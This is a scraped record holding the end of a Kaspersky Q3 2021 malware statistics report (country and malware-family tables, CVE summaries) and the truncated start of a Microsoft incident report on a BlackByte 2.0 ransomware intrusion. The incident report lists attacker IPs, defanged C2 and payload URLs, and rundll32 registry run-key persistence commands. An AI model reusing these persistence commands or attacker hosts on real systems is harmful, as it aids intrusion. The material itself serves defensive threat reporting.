launch of at least one piece of banking malware on the computers of 104,257 unique users.\n\n_Number of unique users attacked by financial malware, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150303/01-en-malware-report-q3-2021-pc-graphs.png>))_\n\n**Geography of financial malware attacks**\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country._\n\n_Geography of financial malware attacks, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150355/02-en-malware-report-q3-2021-pc-graphs.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Turkmenistan | 5.4 \n2 | Tajikistan | 3.7 \n3 | Afghanistan | 3.5 \n4 | Uzbekistan | 3.0 \n5 | Yemen | 1.9 \n6 | Kazakhstan | 1.6 \n7 | Paraguay | 1.6 \n8 | Sudan | 1.6 \n9 | Zimbabwe | 1.4 \n10 | Belarus | 1.1 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 17.7 \n2 | SpyEye | Trojan-Spy.Win32.SpyEye | 17.5 \n3 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 9.6 \n4 | Trickster | Trojan.Win32.Trickster | 4.5 \n5 | RTM | Trojan-Banker.Win32.RTM | 3.6 \n6 | Nimnul | Virus.Win32.Nimnul | 3.0 \n7 | Gozi | Trojan-Banker.Win32.Gozi | 2.7 \n8 | Danabot | Trojan-Banker.Win32.Danabot | 2.4 \n9 | Tinba | Trojan-Banker.Win32.Tinba | 1.5 \n10 | Cridex | Backdoor.Win32.Cridex | 1.3 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\nIn Q3, the family ZeuS/Zbot (17.7%), as usual, became the most widespread family of bankers. Next came the SpyEye (17.5%) family, whose share doubled from 8.8% in the previous quarter. The Top 3 was rounded out by the CliptoShuffler family (9.6%) \u2014 one position and just 0.3 p.p. down. The families Trojan-Banker.Win32.Gozi (2.7%) and Trojan-Banker.Win32.Tinba (1.5%) have made it back into the Top 10 in Q3 \u2014 seventh and ninth places, respectively.\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\n#### Attack on Kaseya and the REvil story\n\nIn early July, the group REvil/Sodinokibi [attempted an attack](<https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/>) on the remote administration software Kaseya VSA, compromising several managed services providers (MSP) who used this system. Thanks to this onslaught on the supply chain, the attackers were able to infect over one thousand of the compromised MSPs' client businesses. REvil's original $70 million ransom demand in exchange for decryption of all the users hit by the attack was soon moderated to 50 million.\n\nFollowing this massive attack, law enforcement agencies stepped up their attention to REvil, so by mid-July the gang turned off their Trojan infrastructure, suspended new infections and dropped out of sight. Meanwhile, Kaseya got a universal decryptor for all those affected by the attack. [According to](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689-Important-Notice-August-4th-2021>) Kaseya, it "did not pay a ransom \u2014 either directly or indirectly through a third party". Later [it emerged](<https://www.washingtonpost.com/national-security/ransomware-fbi-revil-decryption-key/2021/09/21/4a9417d0-f15f-11eb-a452-4da5fe48582d_story.html>) that the company got the decryptor and the key from the FBI.\n\nBut already in the first half of September, REvil was up and running again. [According to](<https://www.bleepingcomputer.com/news/security/revil-ransomware-is-back-in-full-attack-mode-and-leaking-data/>) the hacking forum XSS, the group's former public representative known as UNKN "disappeared", and the malware developers, failing to find him, waited awhile and restored the Trojan infrastructure from backups.\n\n#### The arrival of BlackMatter: DarkSide restored?\n\nAs we already wrote in our Q2 report, the group DarkSide folded its operations after their "too high-profile" attack on Colonial Pipeline. And now there is a "new" arrival known as BlackMatter, which, as its members [claim](<https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil>), represents the "best" of DarkSide, REvil and LockBit.\n\nFrom our analysis of the BlackMatter Trojan's executable we conclude that most likely it was built using DarkSide's source codes.\n\n#### Q3 closures\n\n * Europol and the Ukrainian police have [arrested](<https://www.europol.europa.eu/newsroom/news/ransomware-gang-arrested-in-ukraine-europol's-support>) two members of an unnamed ransomware gang. The only detail made known is that the ransom demands amounted to \u20ac5 to \u20ac70 million.\n * Following its attack on Washington DC's Metropolitan Police Department, the group Babuk folded (or just suspended) its operations and published an archive containing the Trojan's source code, build tools and keys for some of the victims.\n * At the end of August, Ragnarok (not to be confused with RagnarLocker) suddenly called it a day, deleted all their victims' info from their portal and published the master key for decryption. The group gave no reasons for this course of action.\n\n#### Exploitation of vulnerabilities and new attack methods\n\n * The group HelloKitty used to distribute its ransomware by exploiting the vulnerability CVE-2019-7481 in SonicWall gateways.\n * Magniber and Vice Society penetrated the target systems by exploiting the vulnerabilities from the PrintNightmare family (CVE-2021-1675, CVE-2021-34527, CVE-2021-36958).\n * The group LockFile exploited ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) to penetrate the victim's network; for lateral expansion they relied on the new PetitPotam attack that gained control of the domain controller.\n * The group Conti also used ProxyShell exploits for its attacks.\n\n### Number of new ransomware modifications\n\nIn Q3 2021, we detected 11 new ransomware families and 2,486 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q3 2020 \u2014 Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150433/03-en-ru-es-malware-report-q3-2021-pc-graphs.png>))_\n\n## Number of users attacked by ransomware Trojans\n\nIn Q3 2021, Kaspersky products and technologies protected 108,323 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150459/04-en-malware-report-q3-2021-pc-graphs.png>))_\n\n## Geography of ransomware attacks\n\n_Geography of attacks by ransomware Trojans, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150535/05-en-malware-report-q3-2021-pc-graphs.png>))_\n\n**Top 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 1.98 \n2 | Uzbekistan | 0.59 \n3 | Bolivia | 0.55 \n4 | Pakistan | 0.52 \n5 | Myanmar | 0.51 \n6 | China | 0.51 \n7 | Mozambique | 0.51 \n8 | Nepal | 0.48 \n9 | Indonesia | 0.47 \n10 | Egypt | 0.45 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000). \n** Unique users attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n## Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 27.67% \n2 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 17.37% \n3 | WannaCry | Trojan-Ransom.Win32.Wanna | 11.84% \n4 | (generic verdict) | Trojan-Ransom.Win32.Gen | 7.78% \n5 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 5.58% \n6 | (generic verdict) | Trojan-Ransom.Win32.Phny | 5.57% \n7 | PolyRansom/VirLock | Virus.Win32.Polyransom / Trojan-Ransom.Win32.PolyRansom | 2.65% \n8 | (generic verdict) | Trojan-Ransom.Win32.Agent | 2.04% \n9 | (generic verdict) | Trojan-Ransom.MSIL.Encoder | 1.07% \n10 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 1.04% \n \n_* Unique Kaspersky users attacked by this family of ransomware Trojans as a percentage of all users attacked by such malware._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q3 2021, Kaspersky solutions detected 46,097 new modifications of miners.\n\n_Number of new miner modifications, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150605/06-en-malware-report-q3-2021-pc-graphs.png>))_\n\n### Number of users attacked by miners\n\nIn Q3, we detected attacks using miners on the computers of 322,131 unique users of Kaspersky products worldwide. And while during Q2 the number of attacked users gradually decreased, the trend was reversed in July and August 2021. With slightly over 140,000 unique users attacked by miners in July, the number of potential victims almost reached 150,000 in September.\n\n_Number of unique users attacked by miners, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150635/07-en-malware-report-q3-2021-pc-graphs.png>))_\n\n### Geography of miner attacks\n\n_Geography of miner attacks, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23150710/08-en-malware-report-q3-2021-pc-graphs.png>))_\n\n**Top 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Ethiopia | 2.41 \n2 | Rwanda | 2.26 \n3 | Myanmar | 2.22 \n4 | Uzbekistan | 1.61 \n5 | Ecuador | 1.47 \n6 | Pakistan | 1.43 \n7 | Tanzania | 1.40 \n8 | Mozambique | 1.34 \n9 | Kazakhstan | 1.34 \n10 | Azerbaijan | 1.27 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000). \n** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyberattacks\n\n### Quarter highlights\n\nMuch clamor was caused in Q3 by a whole new family of vulnerabilities in Microsoft Windows printing subsystem, one already known to the media as PrintNightmare: [CVE-2021-1640](<https://nvd.nist.gov/vuln/detail/CVE-2021-1640>), [CVE-2021-26878](<https://nvd.nist.gov/vuln/detail/CVE-2021-26878>), [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>), [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>), [CVE-2021-36936](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36936>), [CVE-2021-36947](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36947>), [CVE-2021-34483](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34483>). All those vulnerabilities allow for local escalation of privileges or remote execution of commands with system rights and, as they require next to nothing for exploitation, they are often used by popular mass infection tools. To fix them, several Microsoft patches are required.\n\nThe vulnerability known as PetitPotam proved no less troublesome. It allows an unprivileged user to take control of a Windows domain computer \u2014 or even a domain controller \u2014 provided the Active Directory certificate service is present and active.\n\nIn the newest OS Windows 11, even before its official release, the vulnerability [CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34483>) was detected and dubbed HiveNightmare/SeriousSam. It allows an unprivileged user to copy all the registry threads, including SAM, through the shadow copy mechanism, potentially exposing passwords and other critical data.\n\nIn Q3, attackers greatly favored exploits targeting the vulnerabilities ProxyToken, ProxyShell and ProxyOracle ([CVE-2021-31207](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207>), [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>), [CVE-2021-31207](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207>), [CVE-2021-33766](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33766>), [CVE-2021-31195](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31195>), [CVE-2021-31196](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31196>)). If exploited in combination, these open full control of mail servers managed by Microsoft Exchange Server. We already covered [similar vulnerabilities](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>) \u2014 for instance, they were used in a HAFNIUM attack, also targeting Microsoft Exchange Server.\n\nAs before, server attacks relying on brute-forcing of passwords to various network services, such as MS SQL, RDP, etc., stand out among Q3 2021 network threats. Attacks using the exploits EternalBlue, EternalRomance and similar are as popular as ever. Among the new ones is the grim vulnerability enabling remote code execution when processing the Object-Graph Navigation Language in the product Atlassian Confluence Server ([CVE-2021-26084](<https://jira.atlassian.com/browse/CONFSERVER-67940>)) often used in various corporate environments. Also, Pulse Connect Secure was found to contain the vulnerability [CVE-2021-22937](<https://nvd.nist.gov/vuln/detail/CVE-2021-22937>), which however requires the administrator password for it to be exploited.\n\n### Statistics\n\nAs before, exploits for Microsoft Office vulnerabilities are still leading the pack in Q3 2021 (60,68%). These are popular due to the large body of users, most of whom still use older versions of the software, thus making the attackers' job much easier. The share of Microsoft Office exploits increased by almost 5 p.p. from the previous quarter. Among other things, it was due to the fact that the new vulnerability [CVE-2021-40444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40444>) was discovered in the wild, instantly employed to compromise user machines. The attacker can exploit it by using the standard functionality that allows office documents to download templates, implemented with the help of special ActiveX components. There is no proper validation of the processed data during the operation, so any malicious code can be downloaded. As you are reading this, the relevant security update is already available.\n\nThe way individual Microsoft Office vulnerabilities are ranked by the number of detections does not change much with time: the first positions are still shared by [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) and [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), with another popular vulnerability [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) not far behind. We already covered these many times \u2014 all the above-mentioned vulnerabilities execute commands on behalf of the user and infect the system.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23151038/09-en-malware-report-q3-2021-pc-graphs.png>))_\n\nThe share of exploits for the popular browsers fell by 3 p.p. from the previous reporting period to 25.57% in Q3. In the three months covered by the report several vulnerabilities were discovered in Google Chrome browser and its script engine V8 \u2014 some of them in the wild. Among these, the following JavaScript engine vulnerabilities stand out: [CVE-2021-30563](<https://chromereleases.googleblog.com/2021/07/stable-channel-update-for-desktop.html>) (type confusion error corrupting the heap memory), [CVE-2021-30632](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html>) (out-of-bounds write in V8) and [CVE-2021-30633](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html>) (use-after-free in Indexed DB). All these can potentially allow remote execution of code. But it should be remembered that for modern browsers a chain of several exploits is often required to leave the sandbox and secure broader privileges in the system. It should also be noted that with Google Chromium codebase (in particular the Blink component and V8) being used in many browsers, any newly detected Google Chrome vulnerability automatically makes other browsers built with its open codebase vulnerable.\n\nThe third place if held by Google Android vulnerabilities (5.36%) \u2014 1 p.p. down from the previous period. They are followed by exploits for Adobe Flash (3.41%), their share gradually decreasing. The platform is no longer supported but is still favored by users, which is reflected in our statistics.\n\nOur ranking is rounded out by vulnerabilities for Java (2.98%), its share also noticeably lower, and Adobe PDF (1.98%).\n\n## Attacks on macOS\n\nWe will remember Q3 2021 for the two interesting revelations. The first one is the use of [malware code targeting macOS](<https://securelist.com/wildpressure-targets-macos/103072/>) as part of the WildPressure campaign. The second is the detailed [review of the previously unknown FinSpy implants](<https://securelist.com/finspy-unseen-findings/104322/>) for macOS.\n\nSpeaking of the most widespread threats detected by Kaspersky security solutions for macOS, most of our Top 20 ranking positions are occupied by various adware apps. Among the noteworthy ones is Monitor.OSX.HistGrabber.b (second place on the list) \u2014 this potentially unwanted software sends user browser history to its owners' servers.\n\n**Top 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Pirrit.j | 13.22 \n2 | Monitor.OSX.HistGrabber.b | 11.19 \n3 | AdWare.OSX.Pirrit.ac | 10.31 \n4 | AdWare.OSX.Pirrit.o | 9.32 \n5 | AdWare.OSX.Bnodlero.at | 7.43 \n6 | Trojan-Downloader.OSX.Shlayer.a | 7.22 \n7 | AdWare.OSX.Pirrit.gen | 6.41 \n8 | AdWare.OSX.Cimpli.m | 6.29 \n9 | AdWare.OSX.Bnodlero.bg | 6.13 \n10 | AdWare.OSX.Pirrit.ae | 5.96 \n11 | AdWare.OSX.Agent.gen | 5.65 \n12 | AdWare.OSX.Pirrit.aa | 5.39 \n13 | Trojan-Downloader.OSX.Agent.h | 4.49 \n14 | AdWare.OSX.Bnodlero.ay | 4.18 \n15 | AdWare.OSX.Ketin.gen | 3.56 \n16 | AdWare.OSX.Ketin.h | 3.46 \n17 | Backdoor.OSX.Agent.z | 3.45 \n18 | Trojan-Downloader.OSX.Lador.a | 3.06 \n19 | AdWare.OSX.Bnodlero.t | 2.80 \n20 | AdWare.OSX.Bnodlero.ax | 2.64 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\n### Geography of threats for macOS\n\n_Geography of threats for macOS, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23151108/10-en-malware-report-q3-2021-pc-graphs.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | France | 3.05 \n2 | Spain | 2.85 \n3 | India | 2.70 \n4 | Mexico | 2.59 \n5 | Canada | 2.52 \n6 | Italy | 2.42 \n7 | United States | 2.37 \n8 | Australia | 2.23 \n9 | Brazil | 2.21 \n10 | United Kingdom | 2.12 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000). \n** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn Q3 2021, France took the lead having the greatest percentage of attacks on users of Kaspersky security solutions (3.05%), with the potentially unwanted software Monitor.OSX.HistGrabber being the prevalent threat there. Spain and India came in second and third, with the Pirrit family adware as their prevalent threat.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q3 2021, most of the devices that attacked Kaspersky honeypots did so using the Telnet protocol. Just less than a quarter of all devices attempted brute-forcing our traps via SSH.\n\nTelnet | 76.55% \n---|--- \nSSH | 23.45% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q3 2021_\n\nThe statistics for working sessions with Kaspersky honeypots show similar Telnet dominance.\n\nTelnet | 84.29% \n---|--- \nSSH | 15.71% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q3 2021_\n\n**Top 10 threats delivered to IoT devices via Telnet**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 39.48 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 20.67 \n3 | Backdoor.Linux.Agent.bc | 10.00 \n4 | Backdoor.Linux.Mirai.ba | 8.65 \n5 | Trojan-Downloader.Shell.Agent.p | 3.50 \n6 | Backdoor.Linux.Gafgyt.a | 2.52 \n7 | RiskTool.Linux.BitCoinMiner.b | 1.69 \n8 | Backdoor.Linux.Ssh.a | 1.23 \n9 | Backdoor.Linux.Mirai.ad | 1.20 \n10 | HackTool.Linux.Sshbru.s | 1.12 \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\nDetailed IoT threat statistics are published in our Q3 2021 DDoS report: <https://securelist.com/ddos-attacks-in-q3-2021/104796/#attacks-on-iot-honeypots>\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose and web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that serve as sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._\n\nIn Q3 2021, Kaspersky solutions blocked 1,098,968,315 attacks launched from online resources located across the globe. Web Anti-Virus recognized 289,196,912 unique URLs as malicious.\n\n_Distribution of web-attack sources by country, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23151328/13-en-malware-report-q3-2021-pc-graphs-1.png>))_\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Tunisia | 27.15 \n2 | Syria | 17.19 \n3 | Yemen | 17.05 \n4 | Nepal | 15.27 \n5 | Algeria | 15.27 \n6 | Macao | 14.83 \n7 | Belarus | 14.50 \n8 | Moldova | 13.91 \n9 | Madagascar | 13.80 \n10 | Serbia | 13.48 \n11 | Libya | 13.13 \n12 | Mauritania | 13.06 \n13 | Mongolia | 13.06 \n14 | India | 12.89 \n15 | Palestine | 12.79 \n16 | Sri Lanka | 12.76 \n17 | Ukraine | 12.39 \n18 | Estonia | 11.61 \n19 | Tajikistan | 11.44 \n20 | Qatar | 11.14 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000). \n** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average during the quarter, 8.72% of computers of Internet users worldwide were subjected to at least one **Malware-class** web attack.\n\n_Geography of web-based malware attacks, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23151358/14-en-malware-report-q3-2021-pc-graphs.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q3 2021, our File Anti-Virus detected **62,577,326** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Turkmenistan | 47.42 \n2 | Yemen | 44.27 \n3 | Ethiopia | 42.57 \n4 | Tajikistan | 42.51 \n5 | Uzbekistan | 40.41 \n6 | South Sudan | 40.15 \n7 | Afghanistan | 40.07 \n8 | Cuba | 38.20 \n9 | Bangladesh | 36.49 \n10 | Myanmar | 35.96 \n11 | Venezuela | 35.20 \n12 | China | 35.16 \n13 | Syria | 34.64 \n14 | Madagascar | 33.49 \n15 | Rwanda | 33.06 \n16 | Sudan | 33.01 \n17 | Benin | 32.68 \n18 | Burundi | 31.88 \n19 | Laos | 31.70 \n20 | Cameroon | 31.28 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000). \n** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/23151433/15-en-malware-report-q3-2021-pc-graphs.png>))_\n\nOn average worldwide, **Malware-class** local threats were recorded on 15.14% of users' computers at least once during the quarter. Russia scored 14.64% in this rating.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-26T12:00:36", "type": "securelist", "title": "IT threat evolution in Q3 2021. PC statistics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2019-7481", "CVE-2021-1640", "CVE-2021-1675", "CVE-2021-22937", "CVE-2021-26084", "CVE-2021-26878", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31195", "CVE-2021-31196", "CVE-2021-31207", "CVE-2021-33766", "CVE-2021-34473", "CVE-2021-34483", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-36934", "CVE-2021-36936", "CVE-2021-36947", "CVE-2021-36958", "CVE-2021-40444"], "modified": "2021-11-26T12:00:36", "id": "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48", "href": "https://securelist.com/it-threat-evolution-in-q3-2021-pc-statistics/104982/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mmpc": [{"lastseen": "2023-07-18T21:01:53", "description": "As ransomware attacks continue to grow in number and sophistication, threat actors can quickly impact business operations if organizations are not well prepared. In a recent investigation by Microsoft Incident Response (previously known as Microsoft Detection and Response Team \u2013 DART) of an intrusion, we found that the threat actor progressed through the full attack chain, from initial access to impact, in less than five days, causing significant business disruption for the victim organization.\n\nOur investigation found that within those five days, the threat actor employed a range of tools and techniques, culminating in the deployment of BlackByte 2.0 ransomware, to achieve their objectives. These techniques included:\n\n * Exploitation of unpatched internet-exposed Microsoft Exchange Servers\n * Web shell deployment facilitating remote access\n * Use of living-off-the-land tools for persistence and reconnaissance\n * Deployment of Cobalt Strike beacons for command and control (C2)\n * Process hollowing and the use of vulnerable drivers for defense evasion\n * Deployment of custom-developed backdoors to facilitate persistence\n * Deployment of a custom-developed data collection and exfiltration tool\n![BlackByte 2.0 ransomware attack chain by order of stages: initial access and privilege escalation, persistence and command and control, reconnaissance, credential access, lateral movement, data staging and exfiltration, and impact. ](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/07/BlackByte-attack-flow-diagram-1024x514.webp)Figure 1. BlackByte 2.0 ransomware attack chain\n\nIn this blog, we share details of our investigation into the end-to-end attack chain, exposing security weaknesses that the threat actor exploited to advance their attack. As we learned from Microsoft\u2019s tracking of ransomware attacks and the [cybercriminal economy](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>) that enables them, disrupting common attack patterns could stop many of the attacker activities that precede ransomware deployment. This case highlights that common security hygiene practices go a long way in preventing, identifying, and responding to malicious activity as early as possible to mitigate the impact of ransomware attacks. We encourage organizations to follow the outlined mitigation steps, including ensuring that internet-facing assets are up to date and configured securely. We also share indicators of compromise, detection details, and hunting guidance to help organizations identify and respond to these attacks in their environments. \n\n## Forensic analysis\n\n### Initial access and privilege escalation\n\nTo obtain initial access into the victim\u2019s environment, the threat actor was observed exploiting the [ProxyShell vulnerabilities](<https://techcommunity.microsoft.com/t5/exchange-team-blog/proxyshell-vulnerabilities-and-your-exchange-server/ba-p/2684705>) CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207 on unpatched Microsoft Exchange Servers. The exploitation of these vulnerabilities allowed the threat actor to:\n\n * Attain system-level privileges on the compromised Exchange host\n * Enumerate LegacyDN of users by sending Autodiscover requests, including SIDs of users\n * Construct a valid authentication token and use it against the Exchange PowerShell backend\n * Impersonate domain admin users and create a web shell by using the _New-MailboxExportRequest_ cmdlet\n * Create web shells to obtain remote control on affected servers\n\nThe threat actor was observed operating from the following IP to exploit ProxyShell and access the web shell:\n\n * 185.225.73[.]244\n\n### Persistence\n\n**Backdoor**\n\nAfter gaining access to a device, the threat actor created the following registry run keys to run a payload each time a user signs in:\n\nRegistry key| Value name| Value data \n---|---|--- \nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run | MsEdgeMsE| rundll32 C:\\Users\\user\\Downloads\\api-msvc.dll,Default \nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run | MsEdgeMsE| rundll32 C:\\temp\\api-msvc.dll,Default \nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run | MsEdgeMsE| rundll32 C:\\systemtest\\api-system.png,Default \n \nThe file _api-msvc.dll _(SHA-256: 4a066569113a569a6feb8f44257ac8764ee8f2011765009fdfd82fe3f4b92d3e) was determined to be a backdoor capable of collecting system information, such as the installed antivirus products, device name, and IP address. This information is then sent via HTTP POST request to the following C2 channel:\n\n * _hxxps://myvisit[.]alteksecurity[.]org/t_\n\nThe organization was not using Microsoft Defender Antivirus, which detects this malware as Trojan:Win32/Kovter!MSR, as the primary antivirus solution, and the backdoor was allowed to run.\n\nAn additional file, _api-system.png_, was identified to have similarities to _api-msvc.dll_. This file behaved like a DLL, had the same default export function, and also leveraged run keys for persistence.\n\n**Cobalt Strike Beacon**\n\nThe threat actor leveraged Cobalt Strike to achieve persistence. The file _sys.exe _(SHA-256: 5f37b85687780c089607670040dbb3da2749b91b8adc0aa411fd6280b5fa7103), detected by Microsoft Defender Antivirus as Trojan:Win64/CobaltStrike!MSR, was determined to be a Cobalt Strike Beacon and was downloaded directly from the file sharing service _temp[.]sh_:\n\n * _hxxps://temp[.]sh/szAyn/sys.exe_\n\nThis beacon was configured to communicate with the following C2 